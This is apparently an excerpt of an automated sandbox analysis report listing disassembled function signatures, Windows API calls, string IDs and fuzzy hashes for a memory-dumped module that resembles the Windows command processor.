                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                      • String ID:
                                                                                      • API String ID: 4057327938-0
                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction ID: a582bde19aa0065ef1ab6d67d599b1339a4c6851de83f62700157bae693e8267
                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction Fuzzy Hash: 8431A121A08A4286F7F9BB3594801B9F6A8EF8D741FC4413AD94E627A1DF3CE9049670
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                      • String ID: KEYS$LIST$OFF
                                                                                      • API String ID: 411561164-4129271751
                                                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                      • Instruction ID: 1a81ddb25e4dfed4427f7010d571d2e0ae61792d8622134e95596f02f77668aa
                                                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                      • Instruction Fuzzy Hash: 81216F30A08E03D1F6F4AB36A4D5179A2E9EB8D754FC09231C61E622E4EF2CA4448621
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750212
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750228
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375023C
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750251
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 513048808-0
                                                                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                      • Instruction ID: ed0955501e5fc06b7efd5cfc39d3c8f1d1adcb4bdb7fc48c8f245f7b2590f8ee
                                                                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                      • Instruction Fuzzy Hash: 5021922190C68287F6F46B70A5C8278EAA8FF4E755F944135DA0F56790DF3CD4448721
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 513048808-0
                                                                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                      • Instruction ID: 662af5eea71d0154e2b91f0796ac4c09a6f7f8dab65d34f29d59fa2e873d992d
                                                                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                      • Instruction Fuzzy Hash: F9118121A0864282FAF46B74A4C4278EA98FF4D765F845335DA2F523E0DE3CD4448771
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 4104442557-0
                                                                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                      • Instruction ID: c4362d1c8e259775eca6c266c06c0076f70a12226c3251141c94a5f2e9404e3a
                                                                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                      • Instruction Fuzzy Hash: BE116621605F418AEB50EF70E8852A873A8F70D759F810A35EA6E57754DF3CD254C350
                                                                                      APIs
                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937671F9
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79376720D
                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF793767300
                                                                                        • Part of subcall function 00007FF793765740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7937675C4,?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF793765744
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                      • String ID: _p0$wil
                                                                                      • API String ID: 455305043-1814513734
                                                                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                      • Instruction ID: ca2092d23f411db7f00ceda099a0eee0e304d35c1238a5bd9e494658e07025bd
                                                                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                      • Instruction Fuzzy Hash: 0261D661B18A8295EFB5EB3594A01B9A3A9FF8CBC8FD44432D90E27744DF3CD5048321
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                      • String ID: %s
                                                                                      • API String ID: 2401724867-3043279178
                                                                                      • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                      • Instruction ID: 98c709b810a6c4729e9886b217cca4b3009fdad410a9e8d7512da0e1b7c52965
                                                                                      • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                      • Instruction Fuzzy Hash: 8351EF72A0868285EBB0AF31D8902B9B3A9FB4DB95F844135CA4D57795EF3CE441C721
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: iswdigit
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 3849470556-1994581435
                                                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                      • Instruction ID: 5c5267bba9f83ad60654f97cc5d9ac84735fe0d7a42e5773e79ef9eb5e452012
                                                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                      • Instruction Fuzzy Hash: 2B516A31A08A4285F7B5AF36A4C8279B7A9BF4CB64F808535DA4D63790EF7CE440C720
                                                                                      APIs
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793769A10
                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793769994
                                                                                        • Part of subcall function 00007FF79376A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A77A
                                                                                        • Part of subcall function 00007FF79376A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A839
                                                                                        • Part of subcall function 00007FF79376A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A850
                                                                                      • wcsrchr.MSVCRT ref: 00007FF793769A62
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                      • String ID: %s=%s$.
                                                                                      • API String ID: 3242694432-4275322459
                                                                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                      • Instruction ID: 014633fcac2ea2655fa6e53e3f593706f13187bcedb70dac048abe2fbd705a9c
                                                                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                      • Instruction Fuzzy Hash: 2241B321A08B4286FAB0BB3194E42B9D2DAEF8E7A4F844134DD5E277D5DE3CE445C221
                                                                                      APIs
                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937654E6
                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF79376552E
                                                                                        • Part of subcall function 00007FF79376758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675AE
                                                                                        • Part of subcall function 00007FF79376758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675C6
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                      • API String ID: 779401067-630742106
                                                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction ID: ecab872ab862bb5ac31dfab98c95c7e22a3d1aa193bea514396cd5fb561f79e6
                                                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction Fuzzy Hash: C051C972618A8281EBB1AB31E4A47FAE365EF8C798FC44031DA0E67B55DE3CD405C721
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectorytowupper
                                                                                      • String ID: :$:
                                                                                      • API String ID: 238703822-3780739392
                                                                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                      • Instruction ID: 367ce256a251208dff516fd2374a2f5ae28cdb0ad3d1dc3da47928e90818bc21
                                                                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                      • Instruction Fuzzy Hash: B811345260824182FB78AB72E88427AF6E4EF4D79AF858132DD0E17790DF3CD1418724
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                      • API String ID: 3677997916-3870813718
                                                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction ID: edd0383eac29cc3befd8efa02ad1d4ed1bcb7bc0f2acef5670c0b9f9b8948afc
                                                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction Fuzzy Hash: C1115E72618B41C7EB609B20E48426AF7A8FB89765F804231DB8D137A8DF7CD148CF10
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 110935159-0
                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction ID: ac86cb9b02b6d142be99b65d12e27b5bbc8461f1910960b4bcf6114e8ee6b853
                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction Fuzzy Hash: 3551D722B0978285FEB1AB2198983F9D399BF4DBA4F894531CE5D2B7C4DE3CE5419310
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                      • String ID:
                                                                                      • API String ID: 1403193329-0
                                                                                      • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                      • Instruction ID: 7a9f20e2e8c2df6b65e01261b37a0cf5d85a927bff3f94da83000cad7084cb86
                                                                                      • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                      • Instruction Fuzzy Hash: C451C327A0568585EBB9AF30D9806B9B7A4FF4C759F848536CA0E173D4EF3CD5448320
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF79374921C
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7937493AA
                                                                                        • Part of subcall function 00007FF793748B20: wcsrchr.MSVCRT ref: 00007FF793748BAB
                                                                                        • Part of subcall function 00007FF793748B20: _wcsicmp.MSVCRT ref: 00007FF793748BD4
                                                                                        • Part of subcall function 00007FF793748B20: _wcsicmp.MSVCRT ref: 00007FF793748BF2
                                                                                        • Part of subcall function 00007FF793748B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793748C16
                                                                                        • Part of subcall function 00007FF793748B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793748C2F
                                                                                        • Part of subcall function 00007FF793748B20: wcschr.MSVCRT ref: 00007FF793748CB3
                                                                                        • Part of subcall function 00007FF79375417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7937541AD
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                        • Part of subcall function 00007FF793753060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      • wcsrchr.MSVCRT ref: 00007FF7937492D8
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793749362
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793749373
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3966000956-0
                                                                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                      • Instruction ID: fa46a9141fe08f69b729e8617a1a8457e889bec2c89fbb5d4f1be551690404af
                                                                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                      • Instruction Fuzzy Hash: 4D51C532A0968285FBB1AF31D8D42B9A3A9FB4E754F844031CA4D17794DF3CE551C710
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset$_setjmp
                                                                                      • String ID:
                                                                                      • API String ID: 3883041866-0
                                                                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                      • Instruction ID: b4c7dcf35209bcce9ff5378bcb4d8d44bb42fe339d36904fd9e01085c0c03ec1
                                                                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                      • Instruction Fuzzy Hash: 8D515F72708B868AEBB19F30D8843E9B7A9FB49748F804135DA4D57A48DF3CE645CB10
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B4BD
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B518
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B58B
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: ELSE$IF/?
                                                                                      • API String ID: 3223794493-1134991328
                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction ID: 44a51ca4b7972b9b0a796843889b356c3f4887dbcdcd015dbb18842c6d4bac6e
                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction Fuzzy Hash: C8414A21A0964381FBF4BB35A4D92BAE6AEAF4C744FC44039D54E663A5DE3CF8008761
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1532185241-0
                                                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction ID: f39d3dc08ebb12bc9e39a97f9a341872957bdac2845b85c9a440d7c9298e6d70
                                                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction Fuzzy Hash: 4F41F632A04B5187F7A4AB31E49557DFAA5FB8CB80F844535EA0A53B81CF3CE941CB21
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3588551418-0
                                                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction ID: da2f3fb315c532be1588ef3813a7a38b8854d2a9c4a8b30fd263becd5125f8fc
                                                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction Fuzzy Hash: 1241A431A086428BF7B46B31A4D427DF669EF4DB91F944039DA4E67791CE3CE8408760
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                      • String ID:
                                                                                      • API String ID: 2123716050-0
                                                                                      • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                      • Instruction ID: c33577ed7e838f4116533b2cd1aa45c0be00bee234064acf45b940b66de1f3af
                                                                                      • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                      • Instruction Fuzzy Hash: 2641AF32705BC28AFBB59F31D9903E9A798EB4D78CF844034DA4D4AB98DE3CD2448710
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                      • String ID:
                                                                                      • API String ID: 3114114779-0
                                                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                      • Instruction ID: 525e2deb2d8e420b75b62cbbca2cd0a643d9bf773c30f48c39a1128c0257d620
                                                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                      • Instruction Fuzzy Hash: FB414B32A05B42CAF750EF75D4842AC77AAFB48748F954135DA0D63754DF38E416C760
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A77A
                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A7AF
                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A80E
                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A839
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A850
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseErrorLastOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2240656346-0
                                                                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                      • Instruction ID: 20274f0c4a1ce3b54c72eab4214c89f2c5bc18ce66d0282e73064b675f51e144
                                                                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                      • Instruction Fuzzy Hash: E0318F32A18E4286E7E0AF35E490469F7A9FB8C794F945034EA4E63754DF3CD8418B21
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D0F9
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D10F
                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D166
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D17A
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D18C
                                                                                      Similarity
                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3008996577-0
                                                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction ID: 975a45dd6b070c69b9798962f7c79023f63465ff99e22583da645b71387080a9
                                                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction Fuzzy Hash: 69216D22B24A41CAF750AB71E4904BDB7B4FB4DB45B845125DE0EA3B98DF38D140CB65
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CreateSemaphore
                                                                                      • String ID: _p0$wil
                                                                                      • API String ID: 1078844751-1814513734
                                                                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                      • Instruction ID: 5e72be8a84278277c9e201b9fd4f4ce2defecad3dd65091bed697dc5287dc396
                                                                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                      • Instruction Fuzzy Hash: 2F512D61B19B4686EEB1AF34C0E8279E298EF8C7A8FD44535D90D27B81DF3CD4059321
                                                                                      APIs
                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF79376B934
                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9A5
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9F7
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                      • String ID: %WINDOWS_COPYRIGHT%
